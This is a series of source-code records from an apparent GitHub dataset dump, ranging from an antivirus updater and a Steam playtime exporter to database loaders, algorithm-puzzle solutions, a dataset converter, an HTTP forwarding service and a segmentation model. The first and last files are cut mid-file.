dirasset(blocknumber=int(args.dirasset[0]), assetid=args.dirasset[1])\n\n        if args.fileasset:\n            bc = loadblockchain()\n            fileasset(blocknumber=int(args.fileasset[0]), assetid=args.fileasset[1])\n\n        if args.filewholeasset:\n            bc = loadblockchain()\n            filewholeasset(blocknumber=int(args.filewholeasset[0]), assetid=args.filewholeasset[1])\n\n        if args.filewholeremote:\n            bc = loadblockchain()\n            filewholeremote(blocknumber=int(args.filewholeremote[0]), assetid=args.filewholeremote[1])\n\n        if args.commandasset:\n            bc = loadblockchain()\n            commandasset(blocknumber=int(args.commandasset[0]), cmdid=args.commandasset[1])\n\n        if args.dirassethist:\n            bc = loadblockchain()\n            dirassethist(assetid=args.dirassethist)\n\n        if args.fileassethist:\n            bc = loadblockchain()\n            fileassethist(assetid=args.fileassethist)\n\n        if args.cmdhist:\n            bc = loadblockchain()\n            cmdhist(cmdid=args.cmdhist)\n\n        if args.hashchanges:\n            bc = loadblockchain()\n            authorid = args.hashchanges\n            if authorid not in SUPPLIERS:\n                raise hashchangesError(f'Unknown authorid {authorid}')\n\n            authorblocks = blocksbyauthor(authorid=authorid, bc=bc)\n            setoftuples = enumerateassets(authorblocks)\n            assets = sorted(list(setoftuples), key=lambda tpl: tpl[0])\n            print('\\n')\n            print('-'*60)\n            print(f' Blocks by supplier 
{authorid}:')\n print([block.blocknumber for block in authorblocks])\n print('-'*60)\n print(f' Assets by supplier {authorid}:')\n for asset in assets:\n print(asset)\n print('-'*60)\n print('\\n')\n print(f' Supplier {authorid} asset hash changes:')\n print('_'*50)\n for asset in assets:\n blknums = assethashchanges(blocks=authorblocks, assetid=asset[0])\n print(f'asset {asset} changed in blocks:')\n print(f' {sorted(list(blknums))}')\n print('_'*50)\n print('\\n')\n\n if args.dirdiff:\n bc = loadblockchain()\n assetid=args.dirdiff[0]\n blknum1=int(args.dirdiff[1])\n blknum2=int(args.dirdiff[2])\n diff = dirdiff(assetid=assetid, blknum1=blknum1, blknum2=blknum2)\n print('\\n')\n print('-'*60)\n print(f'Directory asset {assetid} changed from block {blknum1} to block {blknum2}')\n print('-'*60)\n for entry in diff['removed']:\n print(f'- {entry}')\n for entry in diff['added']:\n print(f'+ {entry}')\n print('-'*60)\n print('\\n')\n\n if args.hashlist:\n bc = loadblockchain()\n extractallfilehashes()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"totaldefence/forensic-blockchain","sub_path":"bcsim.py","file_name":"bcsim.py","file_ext":"py","file_size_in_byte":68249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25979403496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 10 03:17:23 2022\n\n@author: kimse\n\"\"\"\n\nimport requests\nimport socket\nimport sqlite3\nimport subprocess\nimport os\n\n\nupdate_SERVER = \"https://raw.github.com/kimseongwoo61/test/master/version_info\"\ngit_link = \"https://github.com/kimseongwoo61/test.git\"\nupdate_version = ''\n\ndef conduct_UPDATE():\n if(check_Internet_connection() and check_Update_server()):\n if(compare_VERSION()):\n os.chdir(os.path.abspath( __file__ )+\"\\\\..\\\\..\\\\update\")\n result = subprocess.call(\"git clone \" + git_link , shell=True)\n print(os.getcwd())\n print(result)\n if(not result):\n print(os.getcwd())\n os.chdir(os.getcwd() + \"\\\\test\")\n print(os.getcwd())\n subprocess.call(\"dir\",shell=True)\n \n \n \n# antivirus 버전을 비교한다.\ndef compare_VERSION(): #이상하게 DB를 열 수 없다는 에러가 발생한다. 확인 바람.\n os.chdir(\"C:/Users/kimse/Desktop/DP/DB/\")\n con = sqlite3.connect(\"av_infomation.db\")\n cursor = con.cursor()\n current_version = str(cursor.execute(\"SELECT AV_version FROM sysinfo\").fetchall())[3:-4]\n cursor.close()\n\n left = list(map(int,current_version.split('.')))\n right = list(map(int,update_version.split('.')))\n\n \n for i in range(3):\n if(left[i] > right[i]):\n print(\"서버보다 버전이 높습니다!\")\n return False\n elif(left[i] < right[i]):\n print(\"업데이트 정보를 확인하였습니다! 
--> version_info : "+update_version)\n return True\n elif(left[i] == right[i]):\n continue\n print("현재 최신버전 입니다!")\n print("현재버전 : %s 서버버전 : %s" % (current_version, update_version))\n return False\n \n\n# 깃허브 업데이트 서버 연결 정보를 확인한다.\ndef check_Update_server(): \n res = requests.get(update_SERVER)\n if res.status_code != 200:\n print("잠시후 다시 연결 바랍니다.")\n return False\n \n else:\n global update_version\n update_version = res.text\n return True\n\n\n#인터넷 연결유무를 확인한다.\ndef check_Internet_connection(): \n ip_addr = socket.gethostbyname(socket.gethostname())\n if ip_addr == "127.0.0.1":\n print("인터넷 연결을 확인해 주세요!!!")\n return False\n \n else:\n return True\n \nconduct_UPDATE()\n","repo_name":"kimseongwoo61/DeepScan_AntiVirus","sub_path":"DP/SOURCE/Command/update_AV.py","file_name":"update_AV.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} {"seq_id":"35904516355","text":"import os\nimport logging\nimport time\nimport argparse\nimport configparser\nimport requests\nimport pandas as pd\nfrom pathlib import Path\n\nlogger = logging.getLogger()\ntemps_debut = time.time()\n\n\ndef get_playtime_recent(api_key, user_id):\n url_recent = (\n "https://api.steampowered.com/IPlayerService/GetRecentlyPlayedGames/v1/"\n f"?key={api_key}&steamid={user_id}"\n )\n json_dict_recent = requests.get(url_recent).json()\n games_list_recent = []\n for game in json_dict_recent["response"]["games"]:\n games_list_recent.append(\n {\n "appid": game["appid"],\n "playtime_2weeks": int(game["playtime_2weeks"]),\n }\n )\n return games_list_recent\n\n\ndef get_playtime(api_key, user_id):\n url = (\n "http://api.steampowered.com/IPlayerService/GetOwnedGames/v0001/"\n f"?key={api_key}&steamid={user_id}&format=json"\n )\n json_dict = requests.get(url).json()\n games_list = []\n for game in json_dict["response"]["games"]:\n games_list.append(\n {\n "appid": game["appid"],\n "playtime": game["playtime_forever"],\n "playtime_windows": game["playtime_windows_forever"],\n "playtime_mac": game["playtime_mac_forever"],\n "playtime_linux": game["playtime_linux_forever"],\n }\n )\n return games_list\n\n\ndef main():\n args = parse_args()\n\n config = configparser.ConfigParser()\n try:\n config.read("config.ini")\n except Exception:\n raise FileNotFoundError(\n "No config file found. Be sure you have a config.ini file."\n )\n try:\n api_key = os.environ.get("STEAM_API_KEY")\n if not api_key:\n api_key = config["steam"]["api_key"]\n except Exception:\n raise ValueError("No api_key found. Check your config file.")\n\n if args.user_id:\n user_id = args.user_id\n else:\n try:\n user_id = os.environ.get("STEAM_USERID")\n if not user_id:\n user_id = config["steam"]["user_id"]\n except Exception:\n raise ValueError(\n "No user specified. 
Specify a user_id directive in your config file or use the -u/--user_id flag\"\n )\n\n Path(\"Exports\").mkdir(parents=True, exist_ok=True)\n\n dict_games = get_playtime(api_key, user_id)\n dict_games_recent = get_playtime_recent(api_key, user_id)\n\n df = pd.DataFrame(dict_games)\n df_recent = pd.DataFrame(dict_games_recent)\n df = pd.merge(df, df_recent, how=\"left\", on=[\"appid\"])\n df[\"playtime_2weeks\"] = df[\"playtime_2weeks\"].fillna(0.0).astype(int)\n filename = args.filename if args.filename else f\"Exports/playtime_{user_id}.csv\"\n df.to_csv(filename, sep=\"\\t\", index=False)\n logger.info(f\"Output file: {filename}.\")\n\n logger.info(\"Runtime : %.2f seconds.\" % (time.time() - temps_debut))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"export playtime of games played by a Steam user.\"\n )\n parser.add_argument(\n \"--debug\",\n help=\"Display debugging information\",\n action=\"store_const\",\n dest=\"loglevel\",\n const=logging.DEBUG,\n default=logging.INFO,\n )\n parser.add_argument(\n \"-u\",\n \"--user_id\",\n help=\"User id to extract the games data from (steamID64). Default : user in config.ini\",\n type=str,\n )\n parser.add_argument(\n \"-f\",\n \"--filename\",\n help=\"Override export filename.\",\n type=str,\n )\n args = parser.parse_args()\n\n logging.basicConfig(level=args.loglevel)\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dbeley/steam_stats","sub_path":"scripts/get_playtime.py","file_name":"get_playtime.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34518065980","text":"table_name = 'trucks'\n\nimport sys\nimport psycopg2\nfrom psycopg2 import extras\nimport json\nimport time\nimport os\nfrom multiprocessing import Pool\nfrom functools import partial\n\nclass TruckObservation(object):\n def __init__(self, j):\n tmp = json.loads(j)\n\n self.latitude = tmp['latitude']\n self.longitude = tmp['longitude']\n self.speed = tmp['speed']\n self.speed_unit = tmp['speed_unit']\n self.temperature = tmp['temperature']\n self.temperature_unit = tmp['temperature_unit']\n self.EventProcessedUtcTime = tmp['EventProcessedUtcTime']\n self.ConnectionDeviceId = tmp['IoTHub']['ConnectionDeviceId']\n\n # I know, this is not nice, quick and dirty for the purposes of this blog\n def __getitem__ (self, index):\n if index == 0:\n return self.latitude\n if index == 1:\n return self.longitude\n if index == 2:\n return self.speed\n if index == 3:\n return self.speed_unit\n if index == 4:\n return self.temperature\n if index == 5:\n return self.temperature_unit\n if index == 6:\n return self.EventProcessedUtcTime\n if index == 7:\n return self.ConnectionDeviceId\n else:\n return 0\n\n def __len__(self):\n return 8\n\ndef files_loader(connection_string, table_name, files):\n pool = Pool(processes=5)\n func = partial(pg_load, connection_string, table_name)\n\n while len(files) > 0:\n print(len(files))\n files_to_load = files[0:5]\n files = files[5::]\n pool.map(func, files_to_load)\n\ndef pg_load(connection_string, table_name, file_path): \n sql = \"\"\"INSERT INTO trucks(latitude, longitude, speed, speed_unit, temperature, temperature_unit, eventprocessedutctime, connectiondeviceid) \n VALUES %s\"\"\"\n observations = [] \n\n conn = psycopg2.connect(connection_string)\n print(\"Connecting to Database\")\n cur = conn.cursor() \n \n f = open(file_path, \"r\")\n for x in f: \n observations.append(TruckObservation(x)) \n \n 
print(\"Execute_values\")\n extras.execute_values(cur, sql, observations)\n cur.execute(\"commit;\")\n\n conn.close()\n print(\"DB connection closed.\")\n\n del observations[:]\n\ndirectory_path = sys.argv[1]\nconnection_string = sys.argv[2]\n\nfiles = []\nfor r, d, f in os.walk(directory_path):\n for file in f:\n files.append(os.path.join(r, file))\n \nstart = time.time()\nfiles_loader(connection_string, table_name, files)\nend = time.time()\nprint(\"Loaded data into {}\".format(table_name))\nprint(\"Execution time: {}\".format(end - start))","repo_name":"murdockcrc/timeseries-loader","sub_path":"timescale/timescale.py","file_name":"timescale.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"601849276","text":"# https://www.acmicpc.net/problem/1543\n# 접근 방법 \n# 전체 문서의 문자를 하나씩 탐색하며 만약 검색하고 싶은 단어의 첫글자와 같다면 검색하고 싶은 단어의 인덱스도 하나씩 증가시키며 비교한다.\n# 이때 검색하고 싶은 단어를 모두 탐색했는데 검색하고 싶은 단어와 동일하다면 이를 하나씩 카운트한다.\n\n# 문서의 길이는 최대 2500이므로 길지 않기에 리스트로 변환하지 않고, 문자열로 처리한다.\n\n# document = [x for x in input()] # 인덱싱을 통한 반복을 위해 리스트 형태로 문서 입력\ndocument = input()\nvoca = input() # 검색하고 싶은 단어 입력\n\n# count = 0 # 중복되지 않게 단어가 등장한 횟수 초기화\n# voca_index = 0 # 검색하고 싶은 단어의 인덱스 초기화\n\n# # 문서 탐색\n# for x in document:\n\n# # 찾고자 하는 문자와 현재 문서에서 탐색 중인 문자가 같은 경우 voca_index += 1\n# if voca[voca_index] == x:\n# voca_index += 1\n\n\n# else:\n# voca_index = 0\n \n# # 검색하고자 하는 단어의 인덱스가 단어의 길이와 같아질 때 count +1, voca_index 초기화\n# if voca_index == len(voca):\n# count += 1\n# voca_index = 0\n\n\n# print(count)\n\n\n# 접근 방법 2\n# 문자열의 길이가 2500까지이므로 현재 탐색하고자하는 문서의 길이만큼 매번 탐색을 진행한다.\nstart_index = 0\nend_index = len(voca)\ncount = 0\n\nwhile end_index <= len(document):\n if voca == ''.join(document[start_index:end_index]):\n count += 1\n start_index += len(voca)\n end_index += len(voca)\n else:\n start_index += 1\n end_index += 1\n\nprint(count)\n\n# 접근방법 3\n# count함수를 사용한다.\nprint(document.count(voca))","repo_name":"kong-hana01/Coding-Test","sub_path":"그리디/정리완료/문서검색_1543.py","file_name":"문서검색_1543.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"26032630452","text":"t = int(input())\nmemo = {}\ngrid = []\n\n\ndef nimber(i1, j1, i2, j2):\n if i2 <= i1 or j2 <= j1:\n return 0, 0\n if(i1, j1, i2, j2) in memo:\n return memo[(i1, j1, i2, j2)]\n prohibited_i = set()\n prohibited_j = set()\n for i in range(i1, i2):\n for j in range(j1, j2):\n if grid[i][j]:\n prohibited_i.add(i)\n prohibited_j.add(j)\n successor_nimbers = set()\n nim0s = 0\n # H moves\n for i in range(i1, i2):\n if i in prohibited_i:\n continue\n nim = nimber(i1, j1, i, j2)[0] ^ nimber(i+1, j1, i2, j2)[0]\n successor_nimbers.add(nim)\n if nim == 0:\n nim0s += j2-j1\n # V moves\n for j in range(j1, j2):\n if j in prohibited_j:\n continue\n nim = nimber(i1, j1, i2, j)[0] ^ nimber(i1, j+1, i2, j2)[0]\n successor_nimbers.add(nim)\n if nim == 0:\n nim0s += i2-i1\n nim = 0\n while True:\n if nim not in successor_nimbers:\n memo[(i1, j1, i2, j2)] = nim, nim0s\n return nim, nim0s\n else:\n nim += 1\n\n\nfor casen in range(1, t+1):\n r, c = list(map(int, input().split()))\n memo.clear()\n grid.clear()\n for i in range(r):\n row = input().strip()\n row = [c != '.' 
for c in row]\n grid.append(row)\n _, nim0s = nimber(0, 0, r, c)\n print(\"Case #{}: {}\".format(casen, nim0s))\n","repo_name":"brok3nh3art1981/brok3nh3art1981","sub_path":"tex/googlecodejam/2019_1c/c/input/73rd_Arios16_org.py","file_name":"73rd_Arios16_org.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42732583615","text":"from sqlalchemy import (\n\tBoolean,\n\tColumn,\n\tForeignKey,\n\tInteger,\n\tString,\n\tDate,\n)\n\nfrom sqlalchemy.orm import relationship\n\nfrom main.database.base_class import Base\n\nfrom main.utils.sqlalchemy import (\n\tAwareDateTime,\n\tResourceMixin,\n)\n\n\n\nclass ProgramModel(\n\tBase,\n\tResourceMixin,\n):\n\n\t__tablename__ = 'programs'\n\n\tid = Column(\n\t\tInteger,\n\t\tprimary_key=True,\n\t)\n\n\n\tname = Column(\n\t\tString,\n\t)\n\n\n\tprogram_instances = relationship(\n\t\t'ProgramInstanceModel',\n\t\tback_populates='programs_sc',\n\t\tlazy='selectin',\n\t\tcascade='delete',\n\t)\n\n\tprogram_groups = relationship(\n\t\t'ProgramGroupModel',\n\t\tback_populates='programs_sc',\n\t\tlazy='selectin',\n\t\tcascade='delete',\n\t)\n\n\n\t__mapper_args__ = {\n\t\t'eager_defaults': True,\n\t}\n\n","repo_name":"Logicdraw/ahg-db-main","sub_path":"main/models/data/program/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72583512592","text":"import argparse\nimport os.path as osp\nfrom collections import defaultdict\n\nimport mmcv\nfrom tqdm import tqdm\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='LaSOT test dataset to COCO Video format')\n parser.add_argument(\n '-i',\n '--input',\n help='root directory of LaSOT test dataset',\n )\n parser.add_argument(\n '-o',\n '--output',\n help='directory to save coco formatted label file',\n )\n return parser.parse_args()\n\n\ndef convert_lasot_test(lasot_test, ann_dir, save_dir):\n \"\"\"Convert lasot dataset to COCO style.\n\n Args:\n lasot_test (dict): The converted COCO style annotations.\n ann_dir (str): The path of lasot test dataset\n save_dir (str): The path to save `lasot_test`.\n \"\"\"\n records = dict(vid_id=1, img_id=1, ann_id=1, global_instance_id=1)\n videos_list = osp.join(ann_dir, 'testing_set.txt')\n videos_list = mmcv.list_from_file(videos_list)\n\n lasot_test['categories'] = [dict(id=0, name=0)]\n\n for video_name in tqdm(videos_list):\n video_path = osp.join(ann_dir, video_name)\n video = dict(id=records['vid_id'], name=video_name)\n lasot_test['videos'].append(video)\n\n gt_bboxes = mmcv.list_from_file(\n osp.join(video_path, 'groundtruth.txt'))\n full_occlusion = mmcv.list_from_file(\n osp.join(video_path, 'full_occlusion.txt'))\n full_occlusion = full_occlusion[0].split(',')\n out_of_view = mmcv.list_from_file(\n osp.join(video_path, 'out_of_view.txt'))\n out_of_view = out_of_view[0].split(',')\n\n img = mmcv.imread(osp.join(video_path, 'img/00000001.jpg'))\n height, width, _ = img.shape\n for frame_id, gt_bbox in enumerate(gt_bboxes):\n file_name = '%08d' % (frame_id + 1) + '.jpg'\n file_name = osp.join(video_name, 'img', file_name)\n image = dict(\n file_name=file_name,\n height=height,\n width=width,\n id=records['img_id'],\n frame_id=frame_id,\n video_id=records['vid_id'])\n lasot_test['images'].append(image)\n\n x1, y1, w, h = gt_bbox.split(',')\n ann = dict(\n id=records['ann_id'],\n image_id=records['img_id'],\n 
instance_id=records['global_instance_id'],\n category_id=0,\n bbox=[int(x1), int(y1), int(w),\n int(h)],\n area=int(w) * int(h),\n full_occlusion=full_occlusion[frame_id] == '1',\n out_of_view=out_of_view[frame_id] == '1')\n lasot_test['annotations'].append(ann)\n\n records['ann_id'] += 1\n records['img_id'] += 1\n records['global_instance_id'] += 1\n records['vid_id'] += 1\n\n mmcv.dump(lasot_test, osp.join(save_dir, 'lasot_test.json'))\n print('-----LaSOT Test Dataset------')\n print(f'{records["vid_id"]- 1} videos')\n print(f'{records["global_instance_id"]- 1} instances')\n print(f'{records["img_id"]- 1} images')\n print(f'{records["ann_id"] - 1} objects')\n print('-----------------------------')\n\n\ndef main():\n args = parse_args()\n lasot_test = defaultdict(list)\n convert_lasot_test(lasot_test, args.input, args.output)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"goodproj13/TF-Blender","sub_path":"tools/convert_datasets/lasot2coco.py","file_name":"lasot2coco.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"83"} {"seq_id":"27097719971","text":"from typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n\n n = len(height)\n \n prefixMax = [0] * n\n suffixMax = [0] * n\n \n prefixMax[ 0] = height[ 0]\n suffixMax[-1] = height[-1]\n \n for i in range(1, n):\n prefixMax[ i] = max(prefixMax[ i - 1], height[ i])\n suffixMax[~i] = max(suffixMax[~i + 1], height[~i])\n\n ans = 0\n for i in range(1, n - 1):\n ans += max(min(prefixMax[i - 1], suffixMax[i + 1]) - height[i], 0)\n \n return ans","repo_name":"ChengTsungPao/LeetCode","sub_path":"0042_Trapping_Rain_Water/code3.py","file_name":"code3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} {"seq_id":"34940643620","text":"'''\nSource: Road Surface Wetness Variations.\n Based on the sensor developed by Haavasoja et al. \n The RCM411 road condition monitor sensor could \n measure water layer thickness from 0 to 3 millimeters. \n'''\n\nimport time\n\nclass WetnessDetector:\n def __init__(self):\n self.height = 0 # Height of water measured in millimeters\n \n def __str__(self): \n return str(self.get_layer())\n\n def get_layer(self): \n return self.height\n\n def set_layer(self, height): # Updates the height value. 
\n if not isinstance(height, (int, float)):\n raise TypeError("Invalid value type, can only be a floating value or an integer value\\nWetness detector has stopped running.")\n if height < 0: \n raise Exception("Invalid height, can not be a negative value\\nWetness detector has stopped running.") \n self.height = height \n\n def run(self): # Continuously updates height value.\n while True:\n height = float(input())\n self.set_layer(height)\n time.sleep(30)\n\n\nif __name__ == '__main__': \n import random \n \n w = WetnessDetector()\n while True: \n height = float(random.randint(0, 10))\n print(height)\n w.set_layer(height)\n time.sleep(1)\n\n\n \n","repo_name":"UltraArceus3/HackUConn-HotSidewalks","sub_path":"src/WetnessDetection.py","file_name":"WetnessDetection.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} {"seq_id":"70469924113","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nfrom app import db, create_app\nfrom app.models import Post\nimport time\n\nclass PostCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n p = Post(title='title', body='body')\n db.session.add(p)\n db.session.commit()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def test_post_basic(self):\n p = Post.query.first()\n self.assertTrue(p)\n self.assertTrue(p.timestamp)\n self.assertTrue(p.body)\n self.assertTrue(p.body_html)\n\n def test_on_change(self):\n p = Post.query.first()\n old_time = p.mtimestamp\n time.sleep(1)\n p.body = 'modified'\n db.session.add(p)\n db.session.commit()\n p = Post.query.first()\n self.assertTrue(p.body_html == '<p>modified</p>
')\n self.assertTrue(p.mtimestamp != old_time)\n","repo_name":"fangjh13/Ftown","sub_path":"tests/test_post_models.py","file_name":"test_post_models.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"22266560670","text":"#################################### python-http-middleman ####################################\n# This is a simple python3 program that listens over HTTP for GET requests.\n# When it gets a request it puts it into a queue for later processing.\n# If the processing fails the request goes into a retry queue and tries again.\n# SQLite databases are used to persist the queues.\n# Secondary threads are used to handle the queues.\n# It takes a queue entry, removes some of the JSON that we don't want.\n# Only servers that are in the config file get requests forwarded to them.\n# This setup seems to be pretty good at handling lots of connections coming in quickly.\n# The request handler can take a while to catch up to tons of queued results, but it works.\n###############################################################################################\n\n# Requests get sent to: middleman.quade.co\n# URL format: https://middleman.quade.co/{destination_domain}/{destination_path}\n# Example old URL: https://sensorseed.quade.co/HomeOutsideWeatherStation/Data/Get?....\n# Example new URL: https://middleman.quade.co/sensorseed.quade.co/HomeOutsideWeatherStation/Data/Get?....\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport socketserver\nimport requests\nimport json\nimport queue\nfrom threading import Thread\nimport fnmatch\nimport time\nimport math\nfrom persistqueue import FIFOSQLiteQueue\n\nclass request_object:\n def __init__(self, command, path):\n self.command = command\n self.path = path\n\nclass retry_object:\n def __init__(self, request):\n self.request = request\n self.remaining_tries = 7\n self.last_run_time = time.time()\n\n# FIFO queues\nrequestsQ = FIFOSQLiteQueue(path=\"./requestsQ\", multithreading=True)\nretryQ = FIFOSQLiteQueue(path=\"./retryQ\", multithreading=True)\n\n# Send a get request to a server address\ndef sendget(request):\n try:\n address = request.path.split(\"/\")[1]\n path = request.path.replace(\"/\" + address + \"/\", \"/\")\n print(\"http://\" + address + path)\n r = requests.get(\"http://\" + address + path)\n return r.status_code\n except:\n return '503'\n\n# Handle the retry queue\ndef handleretries():\n while True:\n retry_data = retryQ.get()\n now = time.time()\n # Wait some time before retrying the request (factorial minutse of the number of tries that have been made: 1, 2, 6, 24, 120,...)\n if (now - retry_data.last_run_time) > (math.factorial(8 - retry_data.remaining_tries) * 60):\n print(\"Retrying to send request\")\n status_code = sendget(retry_data.request)\n # if the response isn't ok, decriment the retry count and requeue if there's a try left\n if int(status_code) != int('200'):\n retry_data.remaining_tries = retry_data.remaining_tries - 1\n print(\"Retry failed, tries left: \" + str(retry_data.remaining_tries));\n retry_data.last_run_time = now\n if retry_data.remaining_tries > 0:\n retryQ.put(retry_data)\n else:\n # Add back to end of queue if it isn't time yet\n # Always going through queue might not be the most efficient as the queue grows large, but it works\n retryQ.put(retry_data)\n\n# Handle the HTTP requests in the queue by routing the requests where they need to go\ndef handlerequests():\n while True:\n 
request = requestsQ.get()\n with open('config.json', 'r') as configFile:\n config_json = json.load(configFile)\n for server_element in config_json['servers']:\n # Make sure the server is in the config file\n if fnmatch.fnmatch(server_element['address'], request.path.split(\"/\")[1]):\n # send request, add to retry queue if fail\n status_code = sendget(request)\n print(status_code)\n if int(status_code) != int('200'):\n print(\"Adding request to retry queue\")\n retryQ.put(retry_object(request))\n break\n\n# Basic HTTP server class\nclass S(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n # Handle HTTP requests by putting them into a queue\n def do_POST(self):\n self._set_headers()\n self.wfile.write(\"wrong\".encode(\"utf-8\"))\n\n def do_GET(self): \n requestsQ.put(request_object(self.command, self.path))\n print(\"queued request\") \n self._set_headers()\n self.wfile.write(\"ok\".encode(\"utf-8\"))\n\n# Run the HTTP server on all addresses on a specific port\ndef runserver(server_class=HTTPServer, handler_class=S, port=8123):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print('Starting httpd...')\n httpd.serve_forever()\n\n# main(): setup a second thread to handle the server request queue, and start the HTTP server\nif __name__ == \"__main__\":\n from sys import argv\n\n requestworker = Thread(target=handlerequests)\n requestworker.setDaemon(True)\n requestworker.start()\n\n retryworker = Thread(target=handleretries)\n retryworker.setDaemon(True)\n retryworker.start()\n\n runserver()\n","repo_name":"wdq/csce462","sub_path":"python-http-middleman/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13001025144","text":"import time\r\nfrom selenium import webdriver\r\nimport gkeepapi\r\nimport signal\r\nimport os\r\nimport account\r\n\r\nkeep = gkeepapi.Keep()\r\naccount = keep.login(account.user_id,account.password)\r\n\r\nkeywords =[]\r\nkeywords = keep.find(query='keyword')\r\n\r\n\r\nfor search_word in keywords:\r\n try:\r\n word = search_word.text\r\n driver = webdriver.Chrome(\"c:/driver/chromedriver.exe\")\r\n driver.get('https://www.google.com/')\r\n time.sleep(1)\r\n\r\n search_box = driver.find_element_by_name(\"q\")\r\n search_box.send_keys(word)\r\n search_box.submit()\r\n time.sleep(2)\r\n finally:\r\n os.kill(driver.service.process.pid,signal.SIGTERM)\r\n\r\n\r\n","repo_name":"wb159357/portfolio","sub_path":"memo_app/memo_app.py","file_name":"memo_app.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17419207574","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:\n\nfrom easyai.base_name.model_name import ModelName\nfrom easyai.base_name.block_name import NormalizationType, ActivationType\nfrom easyai.base_name.block_name import LayerType, BlockType\nfrom easyai.base_name.loss_name import LossType\nfrom easyai.loss.utility.cross_entropy2d import CrossEntropy2d\nfrom easyai.model.base_block.utility.upsample_layer import Upsample\nfrom easyai.model.base_block.utility.utility_layer import RouteLayer\nfrom easyai.model.base_block.utility.utility_block import ConvBNActivationBlock\nfrom easyai.model.base_block.utility.utility_block import ConvActivationBlock\nfrom 
easyai.model.backbone.cls.mobilenetv2 import MobileNetV2\nfrom easyai.model.utility.base_model import *\n\n\nclass MobileV2FCN(BaseModel):\n\n def __init__(self, data_channel=3, class_num=2):\n super().__init__()\n self.set_name(ModelName.MobileV2FCN)\n self.class_number = class_num\n self.bn_name = NormalizationType.BatchNormalize2d\n self.activation_name = ActivationType.ReLU\n\n self.create_block_list()\n\n def create_block_list(self):\n self.block_out_channels = []\n self.index = 0\n\n basic_model = MobileNetV2(bnName=self.bn_name, activationName=self.activation_name)\n base_out_channels = basic_model.get_outchannel_list()\n self.add_block_list(BlockType.BaseNet, basic_model, base_out_channels[-1])\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 2\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '13')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 4\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '6')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 8\n self.make_conv_block(input_channel, output_channel)\n\n self.make_layer(base_out_channels, output_channel, 2, '3')\n\n input_channel = self.block_out_channels[-1]\n output_channel = base_out_channels[-1] // 16\n self.make_conv_block(input_channel, output_channel)\n\n input_channel = self.block_out_channels[-1]\n output_channel = self.class_number\n conv4 = ConvActivationBlock(input_channel, output_channel,\n kernel_size=1, stride=1, padding=0,\n activationName=ActivationType.Linear)\n self.add_block_list(conv4.get_name(), conv4, output_channel)\n\n layer10 = Upsample(scale_factor=4, mode='bilinear')\n self.add_block_list(layer10.get_name(), layer10, self.block_out_channels[-1])\n\n self.create_loss()\n\n def create_loss(self, input_dict=None):\n self.lossList = []\n loss = CrossEntropy2d(ignore_index=250)\n self.add_block_list(LossType.CrossEntropy2d, loss, self.block_out_channels[-1])\n self.lossList.append(loss)\n\n def make_layer(self, base_out_channels, conv_output_channel, scale_factor, route_layer_indexs):\n layer1 = Upsample(scale_factor=scale_factor, mode='bilinear')\n self.add_block_list(layer1.get_name(), layer1, self.block_out_channels[-1])\n\n layer2 = RouteLayer(route_layer_indexs)\n output_channel = sum([base_out_channels[i] if i >= 0\n else self.block_out_channels[i] for i in layer2.layers])\n self.add_block_list(layer2.get_name(), layer2, output_channel)\n\n conv1 = ConvBNActivationBlock(self.block_out_channels[-1], conv_output_channel,\n kernel_size=1, stride=1, padding=0,\n bnName=self.bn_name, activationName=self.activation_name)\n 